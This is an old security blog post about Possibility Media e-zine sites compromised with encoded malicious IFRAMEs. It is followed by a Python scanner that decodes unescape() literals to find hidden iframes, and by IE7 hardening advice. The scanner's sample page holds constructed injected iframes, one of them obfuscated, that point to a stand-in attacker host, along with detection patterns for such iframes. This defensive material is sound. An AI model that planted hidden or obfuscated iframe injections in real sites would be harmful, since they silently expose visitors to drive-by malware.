Spyware Sucks
“There is no magic fairy dust protecting Macs" – Dai Zovi, author of “The Mac Hacker’s Handbook"

Danger – Possibility Media web sites compromised

October 27th 2007 in Uncategorized

Source: http://blog.trendmicro.com/malicious-iframes-hosted-on-e-zines-a-media-possibility/

Note: Possibility Media has been bought out by GM Media Worldwide

A handful of online magazines (e-zines) owned by Possibility Media, some of which are related to IT, are hosting malicious IFRAMEs. Security researcher Dancho Danchev shared this discovery with the rest of the security community. Some of the e-zines that are hosting malicious IFRAMEs are:

  • webweekmag.com – Web Week Magazine (site unavailable at time of writing)
  • itweekmagazine.com – IT Week Magazine
  • technologyweekmag.com – Technology Week Magazine
  • theinternetstandardmag.com – The Internet Standard
  • securitystandardmag.com – Security Standard

Danchev notes that there are a total of 24 e-zines, all of which are owned by Possibility Media, that have malicious IFRAMEs embedded in them. Trend Micro threat analyst Jonell Baltazar checked some of the e-zines’ URLs and was able to obtain different binary files that are detected by Trend Micro products as PAK_GENERIC and POSSIBLE_STRAT-6. Other files are now under analysis.

Some more affected sites include:

  • networkweekmag.com – Network Week Magazine (site unavailable at time of writing)
  • portablecomputingmag.com – Portable Computing Magazine
  • businesscomputingmagazine.com – Business Computing Magazine
  • communicationsworldmag.com – Communications World Magazine
  • communicationsweekmag.com – Communication Week Magazine
  • ipworldmag.com – IP World Magazine
  • thebestpcmag.com – The Best PC
  • theitstandard.com – The IT Standard
  • hostingweekmag.com – Hosting Week (site unavailable at time of writing)
  • enterpriseweekmag.com – Enterprise Week
  • computernewsmagazine.com – Computer News
  • ceweekmag.com – CE Week Magazine
  • ebusinessmag.com – Ebusiness Magazine
  • healthcareitmagazine.com – Health Care IT Magazine

Some of the sites have hyperlinks to xaknet.ru added.

The bad guys have encoded the script in question, so a plain text search for "iframe" will not find it. A peek at the source of the itweekmagazine.com home page reveals:

[image: the encoded script as it appears in the page source]

Which, when decoded, reveals:

[image: the decoded script]
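As an added example (not part of the original post or of Trend Micro's analysis), here is a small Python scanner for saved page source that does the "decoding" step above automatically: it pulls the percent-encoded literal out of any document.write(unescape('...')) call, decodes it, and then flags IFRAMEs that are hidden (1x1, zero-size, visibility:hidden, display:none) or that point off the site. The sample page, the attacker.invalid host and the file names are constructed for the example; itweekmagazine.com is used only as the host name of the page being scanned.

```python
"""Scan saved HTML for hidden or obfuscated IFRAMEs.

Two patterns are handled:
  1. iframes written directly into the page, and
  2. iframes hidden inside document.write(unescape('%3Ciframe...')),
     which do not show up in a plain text search for '<iframe'.
"""
import re
from urllib.parse import unquote, urlparse

# Percent-encoded string literal passed to unescape(): unescape('%3C...')
UNESCAPE_LITERAL = re.compile(r"""unescape\(\s*(['"])([^'"]*)\1\s*\)""")
IFRAME_TAG = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")

# Constructed sample page (not real content from any of the listed sites):
# one legitimate banner frame, one plain 0x0 frame to an outside host, and
# one frame that only exists after the unescape() payload is decoded.
SAMPLE_PAGE = """<html><body>
<h1>IT Week Magazine</h1>
<iframe src="/ads/banner.html" width="468" height="60"></iframe>
<iframe src="http://attacker.invalid/counter.php" width=0 height=0 frameborder=0></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//attacker.invalid/in.cgi%3F3%22%20width%3D1%20height%3D1%20style%3D%22visibility%3Ahidden%22%3E%3C/iframe%3E'))</script>
</body></html>"""


def decode_unescape_literals(html):
    """Return the decoded payload of every unescape('...') literal in the page."""
    return [unquote(m.group(2)) for m in UNESCAPE_LITERAL.finditer(html)]


def parse_attrs(attr_text):
    """Parse 'a="b" c=d' style tag attributes into a lower-cased dict."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
            for m in ATTR.finditer(attr_text)}


def is_hidden(attrs):
    """True for the 1x1, zero-size or invisible frames attackers favour."""
    def tiny(value):
        digits = re.sub(r"[^0-9]", "", value)
        return digits != "" and int(digits) <= 1
    style = attrs.get("style", "").replace(" ", "").lower()
    return (tiny(attrs.get("width", "")) or tiny(attrs.get("height", ""))
            or "visibility:hidden" in style or "display:none" in style)


def find_iframes(html, page_host):
    """Return one finding per iframe, including iframes that only appear
    after decoding unescape() payloads (marked obfuscated=True)."""
    findings = []
    sources = [(html, False)] + [(p, True) for p in decode_unescape_literals(html)]
    for text, obfuscated in sources:
        for m in IFRAME_TAG.finditer(text):
            attrs = parse_attrs(m.group(1))
            src = attrs.get("src", "")
            # A relative src stays on the page's own host.
            host = urlparse(src).hostname or page_host
            findings.append({
                "src": src,
                "hidden": is_hidden(attrs),
                "offsite": host != page_host,
                "obfuscated": obfuscated,
            })
    return findings


def suspicious(findings):
    """Anything obfuscated, or hidden and pointing off-site, is worth a look."""
    return [f for f in findings if f["obfuscated"] or (f["hidden"] and f["offsite"])]


def scan_page(html, page_host):
    return suspicious(find_iframes(html, page_host))


if __name__ == "__main__":
    for f in scan_page(SAMPLE_PAGE, "itweekmagazine.com"):
        print("SUSPICIOUS iframe -> %s (hidden=%s offsite=%s obfuscated=%s)"
              % (f["src"], f["hidden"], f["offsite"], f["obfuscated"]))
```

Run it against a page saved with "View Source" (or fetched with a non-browser client so the exploit chain is not triggered); the banner frame is reported clean, while both attacker frames are flagged, including the one that is invisible in the raw HTML until the unescape() literal is decoded.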

IFRAMEs are extremely popular with the low-lifes who hack into and compromise web sites. It would be well worth your while to check your users’ IFRAME security settings. By default, IE7 sets “Launching programs and files in an IFRAME" to Prompt, as you can see below. You may feel that it is better in the current environment to disable that option; after all, too many users will simply click ‘Yes’ if prompted. Bear in mind that this setting only governs programs and files launched from within an IFRAME; it does not stop a hidden frame from loading in the first place, so treat it as one mitigation among several and keep the browser and its plug-ins patched. The setting lives under Internet Options > Security > Custom level > Miscellaneous, and can be pushed out via Group Policy (in the per-zone registry settings it is action 1804, where 3 means Disable).

[image: IE7 security settings dialog with “Launching programs and files in an IFRAME" set to Prompt]

